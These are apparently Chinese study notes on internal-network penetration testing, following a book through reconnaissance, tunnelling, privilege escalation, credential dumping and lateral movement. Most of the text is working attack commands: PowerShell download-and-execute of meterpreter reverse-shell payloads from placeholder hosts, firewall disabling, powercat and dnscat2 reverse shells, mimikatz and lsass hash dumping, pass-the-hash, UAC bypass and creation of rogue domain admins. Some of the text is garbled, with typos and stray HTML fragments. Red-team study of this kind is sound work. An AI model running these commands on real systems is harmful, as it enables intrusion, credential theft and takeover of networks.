内网安全读书笔记
内网渗透测试基础
局域网(Local Area NetWork LAN)
工作组(Work Group)
域(Domain)
活动目录主要提供以下功能
账号集中管理
软件集中管理
环境集中管理
增强安全性(统一杀毒等)
更可靠、更短的宕机时间
- 安全域的划分
划分安全域的目的是将一组安全等级相同的计算机划入同一个网段。
网络访问控制策略(NACL)
DMZ(隔离区)
- 主机平台常用工具
Kali LInux
Wce(windows平局管理器->列出登陆会话、添加修改列出和删除关联凭据(LM Hash、NTLM hash、明文密码和kerberos票据))
mimikatz
Responder(不仅用于嗅探网络内所有的LLMNR 和获取主机的信息、还提供多种渗透测试环境和场景、包括https、SMB、sql server、ftp、ldap、POP3等)
DSHash(从NTDSXtract中提取用户的易于理解的散列值)
Nishang
Empire
ps_encoder.py(使用base64编码封装的powershell命令包)
smbexec(使用Samba工具的快速Psexec类工具)
后门制造工厂
Veil
Cobalt Strike
Windows
nmap
wireshark
putty
sqlmap
burp
hydra
Getif(收集snmap设备信息)
Cain&&Abel(密码恢复工具、通过嗅探网络,破解加密密码,恢复无线网络密钥显示密码框、发现缓存中的密码、分析路由信息、恢复各种密码和凭据)
Powershell
Get-help/$PSVersionTable.PSVERSION 查看powershellb版本
Get-Executionpolicy 查看执行策略
Restricted 脚本不能运行默认
RemoteSigned 本地可以运行
Allsigned 当脚本由受信任的发布者签名时运行
Unrestricted 允许所有脚本运行
Set-ExecutionPolicy XX 设置执行策略
- 常用参数
-ExecutionPolicy Bypass (-Exec Bypass) 绕过执行安全策略
-WindowsStyle Hidden 隐藏窗口
-NonInteractive (-NonI) 非交互模式
-noexit 执行后不退出shell
-NoLogo 启动不显示版权表示的powershell
-enc 允许传入一个base64编码过的powershell脚本字符串作为参数
- 绕过本地权限并执行
Powershell.exe -ExecutionPolicy Bypass -File PowerUp.ps1 命令行环境下绕过本地权限执行
powershell.exe -exec bypass -Command "& {import-Module C:\syst1m.ps1; Invoke-AllChecks}"
目标本地执行脚本
- 下载网络上脚本绕过本地权限执行
Powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet,WebClient).DownloadString("xxx.ps1");[Parameters]
Powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet,WebClient).DownloadString("http://xxx.com/ps.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.1 -lport 80
- 使用base64混淆
echo "IEX(New-ObjectNet,WebClient).DownloadString("http://xxx.com/ps.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.1 -lport 80 -Force" >raw.txt
chmod +x ps_encode.py
./ps_encode.py -s raw.txt
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc xxxx
内网信息搜集
收集本机信息
ipconfig /all 获取本机网络配置信息
systeminfo | finder /B /C:"os Version" 操作系统和版本信息
echo %PROCESOR_ArCHITECTURE% 系统系统结构
wmic_product_get_name,version 结果输出到文本
Powershell.exe "Get-WmiObject -class Win32_Product | Select-Object -Property name,version" powershell收集
wmic service list brief 查询本机服务信息
tasklist 当前进程和进程用户
wmic process list brief 进程信息
wmic startup get command,caption 查看启动程序信息
schtasks /query /to LIST /V 查看计划任务
net statistics workstation 查看主机开机时间
net user 查看用户列表
net localgroup administrators 获取本地管理员信息
query user || qwinsta
netstat -ano 查询端口列表
systeminfo 查询补丁列表
wmic qfe get Caption,Descript,HotFixID,InstalledOn 查询补丁
net share 查询本机共享列表
wmic share get name,path,status
route print 查询所有可用接口的ARP缓存表
arp -a
- 查询防火墙相关配置
netsh firewall set opmode disable 关闭防火墙(03之前)
netsh advfirewall set allprofiles state off(关闭防火墙 03之后)
netsh firewall show config 查看防火墙配置
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable(03之前允许指定程序全部连接)
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow programe="C:/nc.exe"(允许指定程序进入(03之后))
netsh advfirewall add rule name="Allow nc" dir=out action=allow program="c:\nc.exe"(03之后允许指定程序退出)
netsh advifirewall firewall add rule name="Remote Desktop" protocol=Tcp dir=in localport=3389 action=allow 允许3389放行
netsh advifirewall firewall set currentprofile logging filename "C:\windows\temp\fw.log" 自定义防火墙日志存储位置
- 查看代理配置情况
reg query "HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Setting" 查看127.0.0.1 1080端口情况
- 查询并开启远程连接服务
REG QUERY "HKEY_LOCAL_MACHINE|SYSTEM|CurrentControlSet\Control\TerminalServer|WinStation\RDP-TCP" /V PortNumber 查看远程连接端口
WMic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 03开启3389
server08和12开启远程连接
Wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where call setallowtsconnections 1
Wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminaName='RDP-TCP') call setallowtsconnections 1
red add "HKLM\SYSTEM\CURRENT|CONTROLSET\CONTROL\TERMINAL SERVER" /V fSingleSessionPerUser /t REG_DWORD /d 0 /f
- 自动收集信息
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
wmic脚本自动收集
- Empire
usemoudle situational_awareness/host/winenum 本机用户、域组成员、密码设置时间、共享信息等
situational_awareness/host/computerdetails 模块包含了系统中所有有用的信息
查询当前权限
- 查询当前权限
whoami 查看当前权限
whoami /all 查询sid
net user XXX /domain 查询指定用户信息
- 判断是否存在域
ipconfig /all
- 查看系统详细信息
systeminfo
- 查询当前登陆域及用户信息
net config workstation
- 判断主域
net time/domain
探测域内存活主机
- NetBIOS
nbt.exe 192.168.1.1
- ICMP
for /L %I in (1,255) Do @ping -W l -n 192.168.1.%I | findstr "TTL="
- ARP
arp.exe -t 192.168.1.0/20
arp-scan工具
usemodule situational_awarencess/network/arpscan Empire
powershell.exe -exec bypass -Command "& {Import-Moudle c:\arpsacan.ps1};Invoke-Arpscan -CIDR 192.168.1.0/20}" >> c:\log.txt Nishang中的Invoke-ARPScan.ps1
- 常规TCP/UDP
ScanLine
扫描域内端口
- telnet
- S扫描器
- Metasploit
auxiliary/scanner.portscan/tcp
- PowerSploit的INvoke-portscan.ps1脚本
powershell.exe -nop -exec -bypass -c "IEX(New-ObjectNet.Webclint).DownloadString('http:xxx.com/a.ps1');Invoke-Portscan"
- Nishang的Invoke-PortScan模块
Invoke-Portscan -StartAddress 192.168.250.1 -EndAddredd 192.168.250.255 -ResolveHost
收集域内信息
net view /domain 查询域
net view /domain:HACKE
net group /domain 用户组列表
net group "domain computer" domain 查询所有域成员计算机列表
net accounte /domain 域密码策略
nltest /domain_trusts 域信任信息
查找域控制器
- 查看域控制器机器名
nltest /DCLIST:hacke
- 查看域控制器主机名
NSlookup -type=SRV _ldap._tcp
- 查看当前时间
net time /domain
- 查看域控制器组
net group "Domain Controllers" /domain
- 域控制器机器名
netdom query pdc
获取域内用户和管理员信息
- 查询所有域用户列表
net user /domain
- 获取域内用户的详细信息
wmic useraccount get /all
- 查看存在的用户
dsquery user
- 常用dsquery命令
dsquery computer 查找目录中的计算机
contact 联系人
subnet 子网
group 组
ou 组织单位
site 站点
server AD DC/LDS实例
user 用户
quota 配额规定
partition 分区
* 任何对象
- 查询本地管理员用户
net localgroup administrators
- 查询域管理员用户
net group "domain admins" /domain 域管理员用户
net group "ENterprise Admins" /domain 管理员用户组
定位域管理员
net session 看谁使用了本地资源
psloggedon.exe
PVEFindADUser.exe
netsess.exe
hunter
Netview
PowerView
- psloggedon.exe
原理检查HKEY_USERS的key
下载地址
https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon
psloggedon [-] [-l] [-x] [computer|username]
psloggedon \\DC
- PVEFindADUser.exe
下载地址
https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn
-current/-current['username'] 所有用户
-last/-last['username'] 最后登陆用户
PVEFindADUser.exe -current
- netview.exe(绝大部分功能无需管理员权限)
下载地址
https://github.com/mubix/netview
netview.exe 参数
-f filename.txt 指定要提取主机列表的文件
-e filename.txt 指定要排除的主机名的文件
-o filename.txt 将所有输出重定向到指定的文件
-d domain 指定要提取主机列表的域
-g group 指定要锁搜的组名
-c 对已找到的共享目录/文件的访问权限进行检查
- Nmap的nes脚本(无需管理员权限)
下载地址
https://nmap.org/nsedoc/scripts/smb-enum-sessions.html
- PowerView
下载地址
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Invoke-StealthUserHunter
Invoke-UserHunter
- Empire
usemoudle situational_awareness/network/powerview/user_hunter
查找域管理员
- 本机检查
net group "Domain Admins" /domain 获取域管理员列表
tasklist /v 列出本机所有进程及进程用户
- 查询域控制器的域用户会话
net group "Domain Controllers" /domain 查询域控制器列表
net group "Domain Admins" /domain收集域管理员列表
- 收集所有活动域的会话列表
NetSess -h
- 交叉引用域管理员列表与活动会话列表
确定哪些IP地址有活动域令牌
1.域控制器列表dcs.txt 域管理员列表sessions.txt
FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h % i 2>null >sessions.txt && FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a
2.脚本
https://github.com/nullbind/Other-Projects/tree/master/GDA
- 查询远程系统中运行的任务(通过共享的本地管理员账户运行)
net group "Domain Admins" /domain 查询与管理员列表
目标域系统列表添加到ips.txt文件中
收集的域管理员列表添加到names.txt中
FOR /F %i (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL >output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n >NUL && echo [!] %n was found running a process on %i && pause
- 扫描远程系统的NetBIOS信息
域系统列表 ips.txt
域管理员列表 admins.txt
for /F % i in (ips.txt) do @echo [+] Checking % i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n >NUL &&echo [!] %n was found logged into %i
Nbtscan工具
for /F % i in (ips.txt) do @echo [+] Checking % i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n >NUL &&echo [!] %n was found logged into %i
域管理员模拟方法
- Incognito
PowerView
下载地址
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Get-NetDomain 获取当前用户所在域的名称
Get-NetUser 获取所有用户的详细信息
Get-NetDomainController 获取所有域控制器的信息
Get-NetComputer 获取域内所有机器的详细信息
Get-NetOU 获取域中的OU信息
Get-NetGroup 获取所有域内组和组成员信息
Get-NetFileServer 根据spn获取当前域使用的文件服务器信息
Get-NetShare 获取域内所有的网络共享信息
Get-NetSession 获取指定服务器的会话
Get-NetRDPSession 获取服务器的远程连接
Get-NetProcess 获取远程主机的进程
Get-UserEvent 获取指定用户的日志
Get-ADObject 获取活动目录的对象
Get-NetGPO 获取域内所有的组策略对象
Get-DomainPolicy 获取域默认策略或控制器策略
Invoke-UserHUNter 获取域用户登陆的计算机信息以及该用户是否有本地管理员权限
Invoke-ProcessHunter 通过查询域内所有的机器进程找到特定用户
Invoke-UserEventHunter 根据用户日志查询某域用户登陆过哪些域机器
BloodHound
https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-win32-x64.zip
sharphound获取BloodHound需要的信息
https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe
SharpHound.exe -c all
敏感数据的防护
- office
高版本office可通过ProcDump获取密码
隐藏通信隧道技术
隐藏通信隧道基础知识
判断内网连通性
- ICMP
ping xxx.com/192.
- TCP
nc -zv 192.168.1.7 80
- http
curl baidu.com 80
- DNS
nsllokup
nslookup www.baidu.com ip
dig
dig ww.baidu.com -A
- 代理情况
ping -n l -a ip
网络层隧道(ipv6、icmp)
- IPV6
socat
6tunnel
nt6tunnel
- ICMP
关闭本地icmp应答
Sysctl -w net.ipv4.icmp_echo_ignore_all=1
icmpsh
https://github.com/inquisb/icmpsh.git
PingTunnel
icmptunnel
powershell icmp
传输层隧道技术(tcp、udp、常规端口转发)
- lcx
目标机器
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
vps
lcx.exe -listen 4444 5555
本地端口转发
lcx -tran 53 目标主机ip地址 3389
- netcat(nc)
PowerCat(nc的powershell版本)
- 导入
Import-Moudle powercat.ps1
- nc正常连接PowerCat
目标
powercat -l -p 8080 -c cmd.exe -v
本地
netcat 192.168.130 8080 -vv
- nc反向链接PowerCat
本地
nc -l -p 8888 -vv
目标
powercat -c 192.xxx.xxx.xxx -p 8888 -v -e cmd.exe
- PowerCat DNS 隧道
安装dnscat
cd dnscat2/server/
gem install bundler
bundle install
服务端
ruby dnscat2.rb ttpowercat.test -e open --no-cache
目标机
powercat -c 192.xxx.xxx.xxx -p 53 -dns ttpowercat.test -e cmd.exe
- PowerCat 生成payload
powercat -l -p 8000 -e cmd -v -g >> shell.ps1 上传
powercat -c 10.xxx.xxx.xxx -p 8080 -v 监听
编码
powercat -c xxx.xxx.xxx.xxx -p 9999 -ep -ge
监听
powercat -l -p 9999 -v
应用层隧道技术
ssh
- ssh参数
-C 压缩传输、提高传输速度
-f 将ssh传输转入后台执行、不占用当前的shell
-N 建立静默链接(建立了连接、但是看不到具体会话)
-g 允许远程主机连接本地用于转发的端口
-L 本地端口转发
-R 远程端口转发
-D 动态转发(SOCKS代理)
-F 指定ssh端口
- 本地转发
vps kali linux(192.168.1.4)
web服务器(192.168.1.11/1.1.1.16)
数据库服务器(1.1.1.10)
域控制器(1.1.1.2)
vps上
ssh -CfNg -L 1153(vps端口):1.1.1.10(目标主机):3389(访问端口)
rdesktop 127.0.0.1:1153
- 远程转发
web可以访问外网
vps kali linux(1.1.1.4)
web(1.1.1.200)
数据库(1.1.1.10)
域控制器(1.1.1.2)
web服务器上执行
ssh -CfNg -R 3307(vps端口):1.1.1.10(目标主机):3389 [email protected]
rdesktop 127.0.0.1:3307
- 动态转发
vps kali linux(192.168.1.4)
web服务器(192.168.1.11/1.1.1.16)
数据库服务器(1.1.1.10)
域控制器(1.1.1.2)
ssh -CfNg -D 7000 [email protected]
浏览器设置代理
http/https协议
- reGeorg
https://github.com/sensepost/reGeorg
python reGeorgSocksProxy.py -u http://xxx:8080/tunne;.jsp -p 9999
proxyChains 代理访问
- meterpreter
- tunna
DNS
- 查看DNS的连通性
cat /etc/resoiv.conf|grep -v '#' 查询内部域名及IP地址
nslookup hacks.testlab 内部dns连通性
nklookup baidu.com 外部dns连通性
dnscat2(支持多个会话)
https://github.com/iagox86/dnscat2
- 部署域名解析
创建A记录
域名A记录指向vps服务器
创建ns记录(设置子域名dns服务器的)
dnsch子域名解析结果指向域名
- 安装dnscat2服务端
sudo ruby ./dnscat2.rb vpn.xxx.com -e open -c syst1m.com --no-cache
sudo ruby ./dnscat2.rb --dns server=127.0.0.1,port=533.type=txt --secret=syst1m.com
- 目标主机安装客户端
make install 编译
dnscat.exe --ping vpn.xxx.com 测试连通性
dnscat.exe --dns domain=vpn. --secret syst1m.com
dnscat --dns server=ip,port=53,type=txt --secret=syst1m.com
- powershell版本
https://github.com/lukebaggett/dnscat2-powershell
IMport-Moudle .\dnscat2.ps1或者IEX(New-Object System.Net.Webclient).DownloadString('')
开启dnscat2-powershell服务
start-Dnscat2 -Domain vpn.xxx.com --DNSServer 1.x.x.x
IEX加载脚本方式(内存中打开dnscat客户端)
powershell.exe -nop -w hidden -c (IEX(New-Object System.Net.Webclient).DownloadString(''),start-Dnscat2 -Domain vpn.xxx.com --DNSServer 1.x.x.x)
- 参数
exec 打开程序
download 下载文件
help 帮助
clear清屏
delay 修改远程响应延时
shell 得到一个反弹shell
kill 切断通道
listen 类似ssh -l参数 listen 0.0.0.0:53 192.168.1.1 3389
ping 用于确认机器是否在线
windows -i 连接某个通道
iodine(支持linux、mac、windows)
https://github.com/Al1ex/iodine
- 安装服务端
iodined -f -c -P syst1m 192.168.0.1 vpn.xxx.com -Dp
- 安装客户端
iodine -f -p syst1m vpn.xxx.com -M 200
- 使用dns隧道
mstsc 10.0.0.1:3389
SOCKS代理
- EarthWorm
1.正向sockes5服务器
ew -s ssocked -l 888
2. 反弹sockes5服务器(公网vps)
ew -e rcsocks -i 1080 -e 888
ew -s rssocks - d xxx.xxx.xxx.xxx -e 888 (内网web服务器)
- reGeorg
- sSocks
- SocksCap64
- Proxifier
- ProxyChains
vi /etc/proxychains.conf
cp /usr/lib/proxychains3/proxyresoly /usr/bin
proxychains firefox
压缩数据
####RAR
– 以rar格式压缩解压
压缩
rar.exe a -k -r- s -m3 E:\webs\1.rar E:|webs
解压
Rar.exe e E:\webs\1.rar
- 分卷压缩/解压
压缩
Rar.exe a -m0 -r -v20m E:\test.rar E:\API
解压
Rar.exe x E:\test.part01.rar e:\xl
####7-zip
- 普通压缩
压缩
7z.exe a -r -p12345 E:\webs\1.7z e:\webs
解压
7z.exe x -p12345 E:\webs\1.7z -oE:\x
- 分卷压缩
压缩
7z.exe -r -vlm -padmin a e:\test.7z E:\API
解压
7z.exe x -padmin E:\test.7z.001 -oE:\xl
上传和下载
- Ftp上传
本地vps搭建ftp服务传输
- VBS上传
1.输入命令
Set Post=CreateObject("Msxm12.XMLHTTP")>>downloads.vbs
set shell = CreateObject("Wscript.Shell")
Post.OPen "GET","http://server_ip/target.exe",0
Post.Send()
Set aGet = CreateObject(ADODB.stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\test\target.exe"
2.执行脚本
Cscript download.vbs
- 利用Debug上传(只支持小于64kb文件)
kali linix位置
/usr/share/windows-binaries
转为十六进制
wine exe2bat.exe ew.exe ew.txt
- Nishang
> exetotext.ps1
转换
.\ExetoText c:msf.exe c:msf.txt
下载并执行文本文件
Download_Execute http://xxx.xxx.xx.xx/msf.txt
- bitsadmin(xp之后自带)
- powershell下载
权限提升分析及防御
系统内核溢出漏洞提权
通过手动执行命令发现缺失补丁
- 补丁参考
https://github.com/SecWiki/windows-kernel-exploits
whoami /groups 查看当前权限
systeminfo 查看补丁
Wmic qfe get Caption,Description,HotFixID,INstalledOn 列出已经安装的补丁
Caption,Description,HotFixID,INstalledOn | findstr /c:"KB3143141" /c:"KB316902" 查找指定补丁
- MS16-032.ps1(KB3139914)
Invoke-MS16-032 -APPlication cmd.exe -Commandline "/c net user 1 1 /add"
Invoke-MS16-032 -APPlication cmd.exe notpad.exe
- 利用meatsploit发现缺失补丁
post/windows/gather/enum_patches模块
- Windows Exploit Suggester
1. systeminfo 获取补丁情况
2. ./windows-exploit-suggester.py --update 下载安全公告数据库
3. pip install xlrd -upgrade 安装xlrd模块
4. ./windows-exploit-suggester.py -d xx.xls -i patches.txt
- local_exploit_suggester模块(识别系统中可能被利用的漏洞)
post/multi/recon/local_exploit_suggester
- powershell中Sherlock脚本
Import-Moudle c:\Sherlock.ps1
Find-AllVulns
- Cobalt Strike(3.6以后)
elevate ms14-058 smb
Windows操作系统配置错误利用
系统服务权限配置错误
- 下载地址
PowerUp
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
- 运行脚本
powershell.exe -exec bypass -Command "& (Import_Moudle .\PowerUp.ps1; Invoke-Allcheck)"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://xxx.com/PowerUp.ps1'); Invoke-Allcheck"
- 利用C#脚本添加用户(PowerUp的Install-ServiceBinary模块)
powershell.exe -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('c:\PowerUp.ps1');Install-ServiceBinary-ServiceName '服务名' -UserName syst1m -Password syst1m
- 重启系统生效
-
利用msf
service_permissions 模块
利用目标机器上的每一个有缺陷的服务
注册表键AlwayslnstallElevated
- 检测注册表键是否被设置
powershell.exe -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString("c:/powerupps1");Get-RegisterAlwaysInstallElevated
- 生成MSI文件
Write-UserAddMSI
- 普通权限运行MSi文件
可信任服务路径漏洞
-
检测漏洞
“`
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v """
</p></li>
</ul><pre><code class=""><br />- 检测是否有可写权限
</code></pre>
<p>icacls
everyone 完全控制权限(所有用户都有修改这个文件的权限)
M 修改
F 完全控制
CI 丛属容器将继承访问控制项
OI 从属文件将继承访问控制项<pre><code class=""><br />- 重启服务
</code></pre>
恶意文件重命名上传
sc stop service_name
sc start service_name<pre><code class=""><br />- MSF模块
</code></pre>
exploit/windows/local/trusted_service_path
set AutoRunScript migrate -f 自动迁移
<pre><code class=""><br />#### 自动安装配置文件
>可能包含用户名密码
– 搜索配置文件
</code></pre>
dir /b /s c:\Unattend.xml
“`
msf post/windows/gather/enum_unattend计划任务
- 查看计划任务
schtasks /query /fo LIST /v- AccessChk
http://technet.microsoft.com/ZH-cn/sysinternals/bb664922accesschk “username” c:\windows\system32 查看username用户对c:\windows\system32目录的操作权限 找出某个驱动器下所有权限配置有缺陷的文件夹路径 accesschk.exe–uwdqsUsersc: accesschk.exe–uwdqs"AuthenticatedUsers"c: 找出某个驱动器下所有权限配置有缺陷的文件路径 accesschk.exe–uwqsUsersc:*.* accesschk.exe–uwqs"AuthenticatedUsers"c:*.* accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息 sc qc kdc查询kdc服务详细信息 查看某个服务的权限设置 accesschk -cv [service name]Empire
查找系统中的漏洞
usemoudle privesc/powerup/allchecks excute组策略首选项提权
- SYSVOL
用来存放登陆脚本、组策略数据以及其他域控制器需要的域信息等 C:\Windows\SYSVOL\DOMAIN\Policics- 常见组策略首选项(GPP)
映射驱动器(Drivers.xml) 创建本地用户 数据源(DataSources.xml) 打印机配置(Printers.xml) 创建/更新服务(Services.xml) 计划任务(ScheduledTasks.xml)组策略首选项提权
- 创建组策略
手动更新组策略 gpupdate获取组策略凭据
- 手动查找cpassword
type \\dc\sysvol\pentest.com\Policies\{31B2F340-016D-11D2-945F-00c04FB984F9}\MACHINE\Perferences\Group\Groups.xml 解密 python gpprefdecryp.pt 密文- 使用PowerShell获取cpassword
Get-GPPPassword.ps1- Metasploit
post/windows/gather/credentials/gpp- Empire
usemoudle privsec/gppBypassUAC(用户账户控制)
- bypassuac模块
exploit/windows/local/bypassuac- Runas模块
exploit/windows/local/ask 弹窗,点击反弹shell- Nishang中的Invoke-PsUACme模块
Invoke-PsUACme -Verbose 使用sysprep方法并执行默认payload Invoke-PsUACme -method oobe -Verbose 使用oobs方法并执行默认payload Invoke-PsUACme -method oobe -payload "powershell -windiwstyle hidden -e YourEncodePayload" 使用-payload参数自行指定要执行的payload- Empire bypassuac模块
1.usemoudle privesc/bypassuac2.bypassuac_wscript模块 只适用于win7令牌窃取
- 令牌分类
Delegation Tokens 授权令牌 支持交互 Impersonation Tokens 非交互式- 令牌窃取
拥有meterpreter shell
use incognito list-tokens -u 列出可用令牌 impersonate_token 主机名\\用户名 假冒用户- Rotten Potato(快速模拟令牌)
https://github.com/foxglovesec/RottenPotato.gituse incognito list-tokens -u 列出可用令牌 upload exe execute -HC -f rottenpotato.exe impersonate_token "NT AUTHORITY\\SYSTEM"添加域管理员
- cmd
net user shuteer abc123 /ad /domain net group "domain admins shuteer /ad /domain" net group "domain_admins" /domain- meterpreter
add_user shuteer abc123 -h 1.1.1.2 add_group_user "Domain Admins" shuteer -h 1.1.1.2Empire下的令牌窃取
1.creds
- 查看密码
creds 查看列出来的密码- 窃取令牌
pth ID (ID为credID)- 查看当前进程是否有域用户进程窃取
ps 查看进程 steal_token 12004 获取令牌 revtoself 恢复令牌权限无凭证条件下的权限获取
- Responder
https://github.com/SpiderLabs/Responder.git域内横向移动分析及防御
常用windows远程连接和相关命令
IPC
- 建立ipc连接
net use \\192.168.100.190\ipc$ "[email protected]" /user:administrator- ipc$利用条件
(1)开启了135、445端口 (2)管理员开启了默认共享- ipc$失败原因
(1)用户名密码错误 (2)目标没有打开ipc$默认共享 (3)不能连接135、445端口 (4)命令输入错误使用windows自带工具获取远程主机信息
- dir命令
dir- tasklist
tsklist 列出进程计划任务
- at(08之前)
1.net time \\192.168.100.190 2.copy calc.bat \\192.168.100.190\c$ 3.at \\192.168.100.190 4:11pm c:\calc.bat 4.at \\192.168.100.190 7 /delete 执行命令 at \\192.168.100.190 4:41pm cmd.exe \c "ipconfig>c:/1.txt" type \\192.168.100.190\c$\1.txt- schtasks(08之后)
schtasks /create /s 192.168.100.190 /tn /test /sc onstat /tr c:\calc.bat /ru system /f 创建计划任务(test 计划任务名字 启动权限为system) schtasks /run /s 192.168.100.190 / i /tn "test" 运行计划任务 schtasks /delect /s 192.168.100.190 /tn "test" /F 删除计划任务 net use 名称 /del /y 删除ipc$windows系统散列值获取
单机密码抓取
- GetPass
- PwDump7
- QuarksPwDump
QuarksPwDump.exe --dump-hash-local通过SAM和system文件抓取密码
- 导出SAM和System文件
reg save hklm\sam sam.hive reg save hklm\system system.hive- 读取SAM和system文件获得NTLM Hash
mimikatz lsadump::sam /sam:sam.hive /system:system hive- mimikatzz直接读取本地SAM
privilege::debug lsadump::sam使用mimikatz在线读取SAM文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"使用mimikatz离线读取lsass.dmp文件
- 导出lsass.dmp文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp- mimikatz导出散列值
sekurlsa::minidump lsass.DMP 加载文件 sekurlsa::logonPasswords full 导出密码散列Powershell
- Nishang Get-PassHashes.ps1
Import-Moudle .\Get-PassHashes.ps1 GetPassHashs- powershell远程加载mimikatz获取散列值
使用Hashcat获取密码
- 下载
make make install ./hashcat -h- Hashcats使用
hashcat -b 测试当前机器基准速度 -m 指定散列值 -a number 破解模式 hashcat -a 0 -m xx <hashfile> <zidian> <zidian2>- 破解Windows散列值
hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username- 破解 WIFI握手包
aircrack-ng <out.cap> -J <out.hccap> hashcat -m 2500 out.hccap dict.txt防御攻击者抓取明文密码
- 设置Active Directory 2012 R2功能级别
Protected User 添加<-组- 安装KB2871997
安装补丁 禁用Administrator账号- 修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 修改 reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential 查询- 防止mimikatz抓密码
删除拥有debug权限的本地管理员从Administrator组中哈希传递攻击
- 哈希传递攻击
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.com /ntlm:D(Fxxxxxx"- 使用AES-256哈希传递
(1)抓取AES-256密钥 mimikatz "privilege::debug" "sekurlsa::ekeys" (2)哈希传递 mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.com /aes256:2381fXXXX"- 票据传递攻击
mimikatz (1)导出票据 mimikatz "privilege::debug" "sekurlsa::tickets /export" kerberos::purge 清除票据 mimikatz "kerberos::ptt "c:\ticket.kirbi" 注入票据kekeo票据传递 https://github.com/gentilkiwi/kekeo kekeo "tgt:ask /user:administrator /domain:pentest.com /ntlm:D9F9xxxx" 生成票据 klist purge 清除票据 kerberos::ptt [email protected]>[email protected]>kirbiPsExec使用
psTools
https://download.sysinternals.com/files/PSTools.zip- Sysyem权限的shell(-s)
PsExec.exe -accepteula \\192.xxx.xxx.xxx -s cmd.exe- Administrator权限的
Psexec.exe -accepteula \\192.xxx.xxx.xxx cmd.exe- 账号密码远程连接
psexec \\192.xxx.xxx.xxx -u administrator -p Aa123456 cmd.exemetasploit中的psexec
exploit/windows/smb/psexec exploit/windows/smb/psexec_psh(powershell版本)WMI使用
- 基本命令
wmic /node:192.168.100.190 /user:administrator /password:Aa123456 process call create "cmd.exe /c ipconfig >ip.txt" type \\192.xxx.xxx.xx\c$\ip.txt- impacket中的wmiexec
wmiexec.py administrator:[email protected]- wmiexec.vbs
cscript.exe //noiogo wmiexec.vbs /shell 192.xxx.xxx.xxx administrator [email protected] 半交互shell cscript.exe wmiexec.vbs /cmd 192.xxx administrator Aa123456 "ipconfig" -wait 5000 ping/systeminfo等时间较长的命令 -persist nc等不需要结果但需要运行的程序- Invoke-WmiCommand(powerSploit工具包)
$user= "pentest\administrator" $password = ConvertTo-SecureString -String "a123456" -AsPlainText -Force $Cred = New-Object -TypeName System.Management.Automation.PsCredential 远程执行命令 $Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $cred - CompuerName 192.xxxx 将执行结果输出到屏幕 $Remote.PayloadOutput- Invoke-WMIMethod(powershell自带)
$user= "pentest\administrator" $password = ConvertTo-SecureString -String "a123456" -AsPlainText -Force $Cred = New-Object -TypeName System.Management.Automation.PsCredential 远程启动计算器 Invoke-WMIMethod -Class win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "192.xxx.xx.xxx" -Credential $cred永恒之蓝
auxiliary/scanner/smb/smb_ms17_010smbexec使用
C++版smbexec
- 下载地址
https://github.com/sunorr/smbexec- 使用
test.exe ipaddress username password command netshare(1)上传execserver net use \\192.xxxx "Aa123" /user:pentest\adminidtrator cpoy execserver.exe \\192.xxx\c$\windows\ (2)客户端执行命令 test.exe 192.xxx.xxx.xxx administrator Aa123456 whoami c$impacket工具包中的smbexec.py
smbexec.py smbexec.py pentest/administrator:[email protected]Linux跨windows远程执行命令
- 下载地址
https://github.com/brav0hax/smbexecDCOM在远程系统中的使用(分布式组件对象模型)
本地DCOM执行命令
- 获取DCOM程序列表
Get-CimInstance Win32_DCOMApplication win12以上 Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication win7、08- 使用DCOM执行任意命令
